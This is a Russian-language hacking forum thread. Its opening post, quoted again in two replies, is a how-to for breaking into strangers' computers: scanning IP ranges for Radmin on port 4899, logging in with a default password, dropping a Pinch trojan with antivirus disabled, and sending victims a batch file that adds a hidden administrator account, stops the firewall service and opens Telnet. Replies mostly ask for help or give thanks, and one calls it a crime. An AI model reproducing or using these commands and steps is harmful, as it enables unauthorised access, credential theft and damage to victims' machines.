Проникновение в чужой компьютер

Годно?

  • Да!

  • Нет!


Результаты будут видны только после голосования.

VEDMA

Знающий
Дней с нами
2.818
Розыгрыши
0
Сообщения
85
Репутация
5
Реакции
83
Приветствую всех на этом форуме! Данная статья слита с другого форума, к тому же эта моя первая тема, не судите строго

Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).

Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)

Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Далее сохраняем и открываем.

После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.

Открываем радмин, жмем на желтую молнию и вводим айпи.


Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдёт.

Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.

Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.

Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.
В батник пишем следующее:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet

И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)

Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.

Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.

Удачного хека..
bt.gif


Не откажусь от репы)
 
  • Like
Реакции: Maksi__, lilo и faretthan
Приветствую всех на этом форуме! Данная статья слита с другого форума, к тому же эта моя первая тема, не судите строго

Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).

Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)

Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Далее сохраняем и открываем.

После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.

Открываем радмин, жмем на желтую молнию и вводим айпи.


Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдёт.

Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.

Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.

Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.
В батник пишем следующее:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet

И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)

Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.

Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.

Удачного хека..
bt.gif


Не откажусь от репы)
Я не читал,говорю сразу.
Главное - порты открывать нужно?
Я не могу,всеми способами пытался,и если нужно - DArk comet и без всяких заморочек!
 
Есть скрины как это выглядит? Как в TeamViewer или просто через проводник по папкам шаришься
 
Лей под Хайд быстро
 
  • Like
Реакции: oOps
И много нынче юзеров с запущенным радмином, с дефолтным паролем, главное не за натом да и вообще со звер цд? )
Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.
Видно великий пакостник статью писал. Выключить компьютер - супер! :D. Кстати как же "жертва" ничего не заметит если будешь пакостить в гуи? )
 
ну чет хз-хз
 
В радмине еще имя пользователя просит(у меня 3.5 версия). И ссылка на скачивание radmin в шапке либо скрыта либо битая.
через мин 10:
кароч некоторые айпи не просят имени пользователя, но пока на стандартный пароль не попал и подобрать для соидинения не смог
 
Последнее редактирование:
Помню когда то давным давно занимался этим) Только тогда я использовал lamescan 3 хорошая прога, брутила сразу же и выдавала ip с паролем из базы)
 
  • Like
Реакции: AkaBary
Приветствую всех на этом форуме! Данная статья слита с другого форума, к тому же эта моя первая тема, не судите строго

Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).

Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)

Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Далее сохраняем и открываем.

После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.

Открываем радмин, жмем на желтую молнию и вводим айпи.


Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдёт.

Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.

Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.

Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.
В батник пишем следующее:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet

И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)

Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.

Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.

Удачного хека..
bt.gif


Не откажусь от репы)
Это не законно.... т.е киберпреступление
 
Аналогично брутится и удаленка ,не актуально так как сейчас логинов побольше стало ,но можно набрутить парочку
 
upload_2016-7-17_11-21-18.png
, а rview битый
 
Спасибо, попробую
 
Благодарю за материал, пригодится.